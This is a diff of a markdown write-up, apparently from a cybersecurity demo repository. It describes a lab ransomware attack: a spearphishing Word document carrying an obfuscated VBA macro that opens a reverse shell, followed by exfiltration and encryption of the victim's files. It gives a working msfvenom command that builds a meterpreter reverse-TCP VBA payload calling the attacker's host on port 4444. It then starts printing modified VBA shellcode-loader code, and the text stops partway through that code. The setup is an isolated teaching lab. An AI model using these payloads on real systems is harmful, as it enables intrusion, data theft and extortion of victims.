EnricoPiccin02/Cybersecurity-Demo/home.md

 # Ransomware Attack Demo: Basic Spearphishing and Exfiltration
-This document describes the setup and execution of a demo showing a simple example of a **Ransomware Attack**.
+This document outlines the setup and execution of a demonstration showcasing a rudimentary example of a **Ransomware Attack**.

 <br/>

 ## Attack Description
-In the scenario depicted below, the adversary will inject in a carefully constructed **Word document** a **VBA Script** as an obfuscated payload.
-The adversary will then send this document to the victim through a tailored and customized mail message ([Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001/)).<br/>
+In the scenario presented below, the adversary will inject a meticulously crafted  **Word document** with a **VBA Script** as an obfuscated payload.
+Subsequently, the adversary will dispatch this document to the victim via a tailored and customized email message ([Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001/)).<br/>
-It is assumed that the victim will fall prey of the **Spearphishing Attack** and will download and open the document.
-Upon the opening, Microsoft Word will **execute** the VBA Script ([Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059/005/)): this allows the adversary to have a **reverse shell** running on the victims platform and remotely controlled by the adversary itself.<br/>
+It is presupposed that the victim will succumb to the **Spearphishing Attack** and download and open the document.
+Upon opening, Microsoft Word will **execute** the VBA Script ([Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059/005/)), enabling the adversary to establish a **reverse shell** on the victim’s platform and remotely control it.<br/>
-The attacker will then **exfiltrate** victim's files over the established channel ([Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041/)) and **encrypt** them in order to **compromise** their **integrity** and to demand a **ransom** ([Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486/)).
+The attacker will then **exfiltrate** the victim’s files through the established channel ([Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041/)) and **encrypt** them to **compromise** their **integrity** and demand a **ransom** ([Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486/)).

 <br/>

 ## Threat Model
-The **Threat Model** necessary for this attack requires the adversary to
+The necessary **Threat Model** for this attack entails the adversary possessing the following capabilities:
-* know the e-mail address of the victim;
+* knowledge of the victim’s email address;
-* lure the victim to open the Spearphishing Attachment;
+* luring the victim to open the Spearphishing Attachment;
-* establish a TCP connection with the victim's machine;
+* establishing a TCP connection with the victim’s machine;
-* acquire enough privileges on the victim's system in order to execute exfiltration and encryption commands.
+* acquiring sufficient privileges on the victim’s system to execute exfiltration and encryption commands.

 <br/>

 ## Setup
-To perform the attack described above I used two Virtual Machines (referenced to as VMs in the following):
+To execute the attack described above, I utilized two Virtual Machines (referenced as VMs in the following):
-1. the **attacker** is associated with a **Kali Linux VM**, with IPv4 Address `192.168.56.102`;
+1. the **attacker** is associated with a **Kali Linux VM**, with an IPv4 Address of `192.168.56.102`;
-2. the **victim** runs a **Windows 10 VM**, with IPv4 Address `192.168.56.101`.
+2. the **victim** runs a **Windows 10 VM**, with an IPv4 Address of `192.168.56.101`.

-Both VMs have their network adapter configured as "Attached to: **Host-only Adapter**" in order to just allow intra-communication within the local network.
+Both VMs have their network adapter configured as "Attached to: **Host-only Adapter**" to enable only intra-network communication.

 <br/>

 ## Preliminaries
-In order to create the Word document containing the malicious VBA Script, I have used `msfvenom` and a tool called [macro_pack](https://github.com/sevagas/macro_pack); in particular, I execute the following command on the Kali VM:
+To create a Word document containing a malicious VBA script, I employed `msfvenom` and a tool called [macro_pack](https://github.com/sevagas/macro_pack); specifically, I executed the following command on the Kali VM:
 ```
 msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=192.168.56.102 LPORT=4444 -f vba > reverse_shell_exploit.vba
 ```
-In this way, I am able to obtain a VBA Script that, when executed, will try to establish a TCP connection to the pair `<IPv4, Port> = <192.168.56.102, 4444>`.
-To make it more effective, I have edited it in order to launch a thread to do so:
+This command generates a VBA script that attempts to establish a TCP connection to the pair `<IPv4, Port> = <192.168.56.102, 4444>`.
+To enhance its effectiveness, I modified the script to launch a thread to manage this connection:
 ```vb
 #If VBA7 Then
     Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As Long, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr